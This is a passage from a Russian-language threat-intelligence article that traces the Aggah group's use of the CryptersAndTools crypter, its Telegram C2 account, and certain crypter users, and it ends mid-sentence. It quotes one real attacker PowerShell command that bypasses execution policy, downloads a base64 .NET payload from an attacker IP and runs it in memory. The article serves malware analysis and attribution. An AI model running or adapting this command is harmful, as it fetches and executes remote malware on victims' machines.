src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/71a\/9de\/fdc\/71a9defdc2b966a3fc5923f72041eda8.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 22. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0444\u0430\u0439\u043b\u043e\u0432 (tria.ge)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 22. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0444\u0430\u0439\u043b\u043e\u0432 (tria.ge)\" width=\"441\" height=\"264\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/71a\/9de\/fdc\/71a9defdc2b966a3fc5923f72041eda8.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/71a\/9de\/fdc\/71a9defdc2b966a3fc5923f72041eda8.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 22. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437 \u0444\u0430\u0439\u043b\u043e\u0432 (<a href=\"http:\/\/tria.ge\">tria.ge<\/a>)<\/figcaption><\/div>\n<\/figure>\n<p>\u0421\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u0435 \u0430\u0442\u0430\u043a Aggah \u0441 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u043c\u0438 TA558, \u043d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0441\u0445\u043e\u0434\u0441\u0442\u0432\u0430 \u0432 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440\u0435 \u0438 \u043c\u0435\u0442\u043e\u0434\u0430\u0445, \u043d\u0435 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043e\u0434\u043d\u043e\u0437\u043d\u0430\u0447\u043d\u043e \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u043e\u0434\u043d\u0430 \u0438 \u0442\u0430 \u0436\u0435 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430. \u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043e\u043d\u043e \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0438\u0440\u0443\u0435\u0442, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 \u043c\u043e\u0433\u0443\u0442 \u043e\u0431\u043c\u0435\u043d\u0438\u0432\u0430\u0442\u044c\u0441\u044f \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438, \u0438\u0434\u0435\u044f\u043c\u0438 \u0438 \u0440\u0435\u0441\u0443\u0440\u0441\u0430\u043c\u0438.<\/p>\n<p><a class=\"anchor\" name=\"6.3\" id=\"6.3\"><\/a><\/p>\n<h3>6.3 \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Crypters And Tools \u0433\u0440\u0443\u043f\u043f\u043e\u0439 Aggah<\/h3>\n<p>\u0412 \u0440\u0430\u0437\u0434\u0435\u043b\u0435 \u043f\u0440\u043e \u0430\u0442\u0430\u043a\u0438 Aggah 2020-2022 \u043c\u044b \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0433\u0440\u0443\u043f\u043f\u043e\u0439 ManaTools.<\/p>\n<p>\u0412 2021 \u0433\u043e\u0434\u0443 Aggah \u043d\u0430\u0447\u0430\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c 3LOSH Crypter \u0438 FsocietyAndTools \u2013 \u043e\u0434\u043d\u0443 \u0438\u0437 \u0431\u043e\u043b\u0435\u0435 \u0440\u0430\u043d\u043d\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439 CryptersAndTools. \u041f\u0440\u0438 \u0430\u043d\u0430\u043b\u0438\u0437\u0435 \u0430\u0442\u0430\u043a \u0437\u0430 2021 \u0438 2022 \u0433\u043e\u0434 \u043c\u044b \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u0434\u0435\u0442\u0430\u043b\u0435\u0439, \u0443\u043a\u0430\u0437\u044b\u0432\u0430\u044e\u0449\u0438\u0445 \u043d\u0430 \u0441\u0432\u044f\u0437\u044c Aggah \u0438 codigo-\u043a\u0440\u0438\u043f\u0442\u043e\u0440\u043e\u0432.<strong> <\/strong>\u041d\u0430\u043f\u0440\u0438\u043c\u0435\u0440, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u043d\u0430\u043c\u0438 IP-\u0430\u0434\u0440\u0435\u0441 198.50.177[.]251 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f \u043a\u0430\u043a \u0445\u043e\u0441\u0442\u0438\u043d\u0433 \u0434\u043b\u044f \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0440\u0435\u0441\u0443\u0440\u0441\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0434\u0438\u0440\u0435\u043a\u0442\u043e\u0440\u0438\u044e \u201cmastermana\u201d, \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0449\u0443\u044e \u0444\u0430\u0439\u043b\u044b \u0434\u043b\u044f \u0430\u0442\u0430\u043a \u0433\u0440\u0443\u043f\u043f\u044b Aggah, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0443\u0447\u0435\u0442\u043d\u0443\u044e \u0437\u0430\u043f\u0438\u0441\u044c, \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0449\u0443\u044e \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0443 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 nodetecton (\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u0432 \u0446\u0435\u043f\u043e\u0447\u043a\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430).<\/p>\n<p><code>-windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command \"[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http:\/\/<strong>nodetecton@198.50.177.251<\/strong>\/dll\/1.txt'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ClassLibrary3.Class1').GetMethod('Run').Invoke($null, [object[]] ('txt.85618406295\/<strong>anamretsam\/152.771.05.891<\/strong>\/\/:ptth'))\"<\/code><\/p>\n<p>\u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u0431\u044b\u043b\u043e \u0441\u043a\u0430\u0437\u0430\u043d\u043e \u0440\u0430\u043d\u043d\u0435\u0435, \u0432 2019 \u2013 2021 \u0433\u043e\u0434\u0430\u0445 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0430\u043d\u043d\u043e\u0439 Aggah \u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 \u0433\u0440\u0443\u043f\u043f\u044b \u2013 Mana Tools. \u0412 \u0430\u0442\u0430\u043a\u0430\u0445 2022 \u0433\u043e\u0434\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0430\u0442\u0430\u043a\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0412\u041f\u041e XWorm, \u0433\u0434\u0435 \u0432 \u043a\u0430\u0447\u0435\u0441\u0442\u0432\u0435 C2 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043b\u0441\u044f Telegram-\u0431\u043e\u0442, \u0441 \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u043a\u043e\u043c\u043c\u0443\u043d\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043b \u0430\u043a\u043a\u0430\u0443\u043d\u0442 <strong>@mastermana<\/strong>.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/7ac\/cb4\/1c8\/7accb41c85c0e819a2c3390822004c28.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 23. Telegram-\u0430\u043a\u043a\u0430\u0443\u043d\u0442 Mastermana\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 23. Telegram-\u0430\u043a\u043a\u0430\u0443\u043d\u0442 Mastermana\" width=\"804\" height=\"722\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/7ac\/cb4\/1c8\/7accb41c85c0e819a2c3390822004c28.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/7ac\/cb4\/1c8\/7accb41c85c0e819a2c3390822004c28.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 23. Telegram-\u0430\u043a\u043a\u0430\u0443\u043d\u0442 Mastermana<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u043e\u0438\u0441\u043a \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0439 Telegram-\u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a<a href=\"https:\/\/www.youtube.com\/@tinytechnology2029\/\"> Youtube-\u043a\u0430\u043d\u0430\u043b\u0443 <strong>\u201cTiny Technology\u201d<\/strong><\/a><strong>,<\/strong> \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u0442\u0441\u044f \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0435 \u0432\u0438\u0434\u0435\u043e\u0440\u043e\u043b\u0438\u043a\u0438 \u0440\u0430\u0431\u043e\u0442\u044b \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432. \u041d\u0430 \u0431\u043e\u043b\u044c\u0448\u0438\u043d\u0441\u0442\u0432\u0435 \u0432\u0438\u0434\u0435\u043e\u0440\u043e\u043b\u0438\u043a\u043e\u0432 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u043b\u043e\u0433\u043e\u0442\u0438\u043f Mana Tools, \u043d\u043e \u0435\u0441\u0442\u044c \u0431\u043e\u043b\u0435\u0435 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0435 \u0434\u0435\u0442\u0430\u043b\u0438 \u0438\u0437 \u0434\u0430\u043d\u043d\u044b\u0445 \u0432\u0438\u0434\u0435\u043e\u0440\u043e\u043b\u0438\u043a\u043e\u0432:<\/p>\n<ul>\n<li>\n<p>\u0418\u043c\u0435\u043d\u0430 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043d\u0430 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u0438 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u044b\u0445 \u043c\u0430\u0448\u0438\u043d\u0430\u0445 (Master MANA, 007 \u0438 \u0434\u0440\u0443\u0433\u0438\u0435)<\/p>\n<\/li>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f hogya \u0432 BitBucket, \u043a\u043e\u0442\u043e\u0440\u044b\u0439<a href=\"https:\/\/yoroi.company\/research\/serverless-infostealer-delivered-in-est-european-countries\/\"> \u0444\u0438\u0433\u0443\u0440\u0438\u0440\u043e\u0432\u0430\u043b<\/a> \u0434\u043e \u044d\u0442\u043e\u0433\u043e \u0432 \u0430\u0442\u0430\u043a\u0430\u0445 Aggah (\u0440\u0438\u0441\u0443\u043d\u043e\u043a 23)<\/p>\n<\/li>\n<li>\n<p>\u0418\u043d\u0442\u0435\u0440\u0444\u0435\u0439\u0441 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 CryptersAndTools, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u043e\u043c \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0443\u044e\u0442 \u043b\u043e\u0433\u043e\u0442\u0438\u043f\u044b \u043e\u0431\u043e\u0438\u0445 \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432, \u0447\u0442\u043e \u043d\u0430\u0432\u043e\u0434\u0438\u0442 \u043d\u0430 \u043c\u044b\u0441\u043b\u0438 \u043e \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0439 \u0441\u0432\u044f\u0437\u0438 \u0438\u043b\u0438 \u043a\u043e\u043b\u043b\u0430\u0431\u043e\u0440\u0430\u0446\u0438\u0438 (\u0440\u0438\u0441\u0443\u043d\u043e\u043a 24)<\/p>\n<\/li>\n<li>\n<p>\u041f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u0435 CryptersAndTools \u043d\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430 \u0432 2023 \u0433\u043e\u0434\u0443 (\u0440\u0438\u0441\u0443\u043d\u043e\u043a 25)<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/bf8\/183\/afa\/bf8183afadbe52e72e622e1ae0bd6f5f.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 24. \u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 hogya (\u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0432\u0438\u0434\u0435\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 24. \u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 hogya (\u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0432\u0438\u0434\u0435\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438)\" width=\"1430\" height=\"744\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/bf8\/183\/afa\/bf8183afadbe52e72e622e1ae0bd6f5f.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/bf8\/183\/afa\/bf8183afadbe52e72e622e1ae0bd6f5f.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 24. \u0421\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0444\u0430\u0439\u043b\u0430 \u0432 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 hogya (\u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0432\u0438\u0434\u0435\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438)<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/18d\/8c7\/23a\/18d8c723a1718b0e4a971b5679650841.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 25. \u0421\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430 \u0441 CryptersAndTools (\u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0432\u0438\u0434\u0435\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 25. \u0421\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430 \u0441 CryptersAndTools (\u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0432\u0438\u0434\u0435\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438)\" width=\"1427\" height=\"720\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/18d\/8c7\/23a\/18d8c723a1718b0e4a971b5679650841.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/18d\/8c7\/23a\/18d8c723a1718b0e4a971b5679650841.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 25. \u0421\u043e\u0432\u043c\u0435\u0441\u0442\u043d\u0430\u044f \u0440\u0430\u0431\u043e\u0442\u0430 \u0441 CryptersAndTools (\u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0432\u0438\u0434\u0435\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438)<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a56\/7f1\/4cc\/a567f14cc957c7ef377ed835784b4b97.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 26. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Aggah CryptersAndTools \u0432 2023 \u0433\u043e\u0434\u0443 (\u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0432\u0438\u0434\u0435\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 26. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Aggah CryptersAndTools \u0432 2023 \u0433\u043e\u0434\u0443 (\u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0432\u0438\u0434\u0435\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438)\" width=\"1427\" height=\"792\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/a56\/7f1\/4cc\/a567f14cc957c7ef377ed835784b4b97.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a56\/7f1\/4cc\/a567f14cc957c7ef377ed835784b4b97.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 26. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 Aggah CryptersAndTools \u0432 2023 \u0433\u043e\u0434\u0443 (\u0441\u043a\u0440\u0438\u043d\u0448\u043e\u0442 \u0432\u0438\u0434\u0435\u043e\u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u0438)<\/figcaption><\/div>\n<\/figure>\n<p><a class=\"anchor\" name=\"7\" id=\"7\"><\/a><\/p>\n<h3>7. \u041f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Crypters And Tools \u0438 \u0438\u0445 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430\u043c\u0438<\/h3>\n<p>\u041a\u0430\u043a \u0431\u044b\u043b\u043e \u0441\u043a\u0430\u0437\u0430\u043d\u043e \u0432 \u043f\u0435\u0440\u0432\u043e\u0439 \u0447\u0430\u0441\u0442\u0438, \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u043e\u0435 \u0447\u0438\u0441\u043b\u043e \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430, \u043a\u043e\u0442\u043e\u0440\u043e\u0435 \u043c\u044b \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438, \u0431\u044b\u043b\u043e 42 \u043d\u0430 \u043c\u043e\u043c\u0435\u043d\u0442 26 \u043d\u043e\u044f\u0431\u0440\u044f 2024 \u0433\u043e\u0434\u0430. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0441\u0442\u043e\u0438\u0442 \u043e\u0442\u043c\u0435\u0442\u0438\u0442\u044c, \u0447\u0442\u043e \u0432 \u0441\u043f\u0438\u0441\u043a\u0435 \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u043e\u0432\u0430\u043b\u0438 \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u044b \u0441\u0435\u0440\u0432\u0438\u0441\u0430, \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0441 \u0440\u0430\u0437\u043d\u044b\u043c\u0438 \u043d\u0438\u043a\u0430\u043c\u0438, \u043d\u043e \u043e\u0434\u0438\u043d\u0430\u043a\u043e\u0432\u044b\u043c HardwareID, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0442\u0435\u0441\u0442\u043e\u0432\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438. \u0422\u043e \u0435\u0441\u0442\u044c \u0440\u0435\u0430\u043b\u044c\u043d\u043e\u0435 \u043a\u043e\u043b\u0438\u0447\u0435\u0441\u0442\u0432\u043e \u0430\u043a\u0442\u0438\u0432\u043d\u044b\u0445 \u043f\u043e\u0434\u043f\u0438\u0441\u0447\u0438\u043a\u043e\u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0440\u0430 \u0431\u044b\u043b\u043e \u043c\u0435\u043d\u044c\u0448\u0435.<\/p>\n<p>\u0421\u0440\u0435\u0434\u0438 \u043d\u0438\u0445 \u043c\u044b \u043d\u0430\u0448\u043b\u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435\u0439.<\/p>\n<p><a class=\"anchor\" name=\"7.1\" id=\"7.1\"><\/a><\/p>\n<h3>7.1 bukky101<\/h3>\n<p>\u0412 \u0431\u0430\u0437\u0435 \u0434\u0430\u043d\u043d\u044b\u0445 \u043d\u0430\u0441 \u0437\u0430\u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043e\u0432\u0430\u043b \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c:<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e8b\/bfd\/fef\/e8bbfdfefb5bae5145ee049980765e14.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a\u00a027. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437\u00a0\u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u00a0\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 bukky101\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a\u00a027. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437\u00a0\u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u00a0\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 bukky101\" width=\"596\" height=\"298\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/e8b\/bfd\/fef\/e8bbfdfefb5bae5145ee049980765e14.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/e8b\/bfd\/fef\/e8bbfdfefb5bae5145ee049980765e14.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a\u00a027. \u0418\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u044f \u0438\u0437\u00a0\u0431\u0430\u0437\u044b \u0434\u0430\u043d\u043d\u044b\u0445 \u043e\u00a0\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0435 bukky101<\/figcaption><\/div>\n<\/figure>\n<p>\u041f\u0440\u043e \u044d\u0442\u043e\u0433\u043e \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u044b\u0432\u0430\u043b\u0438<a href=\"https:\/\/www.esentire.com\/blog\/ande-loader-leads-to-0bj3ctivity-stealer-infection\"> Esentire \u0432 \u0441\u0432\u043e\u0435\u0439 \u0441\u0442\u0430\u0442\u044c\u0435<\/a>, \u043f\u043e\u0441\u0432\u044f\u0449\u0451\u043d\u043d\u043e\u0439 \u0444\u0438\u0448\u0438\u043d\u0433\u043e\u0432\u044b\u043c \u0430\u0442\u0430\u043a\u0430\u043c \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c Ande Loader, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u043b \u043a \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044e \u0441\u0442\u0438\u043b\u043b\u0435\u0440\u043e\u043c 0bj3ctivity. \u0412 \u0441\u0442\u0430\u0442\u044c\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b\u0438, \u0447\u0442\u043e \u043f\u043e\u0441\u043b\u0435 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u043b\u0438\u0441\u044c \u0432 \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c \u0431\u043e\u0442\u0430. \u0412\u043b\u0430\u0434\u0435\u043b\u044c\u0446\u0435\u043c \u0431\u043e\u0442\u0430 \u0431\u044b\u043b \u044e\u0437\u0435\u0440 bukky101. \u0421 \u0443\u0447\u0451\u0442\u043e\u043c \u0432\u0441\u0435\u0445 \u0442\u0435\u043a\u0443\u0449\u0438\u0445 \u0437\u043d\u0430\u043d\u0438\u0439, \u043c\u044b \u043f\u043e\u043d\u0438\u043c\u0430\u0435\u043c, \u0447\u0442\u043e \u0432 \u043f\u0440\u0438\u0432\u0435\u0434\u0451\u043d\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 bukky101 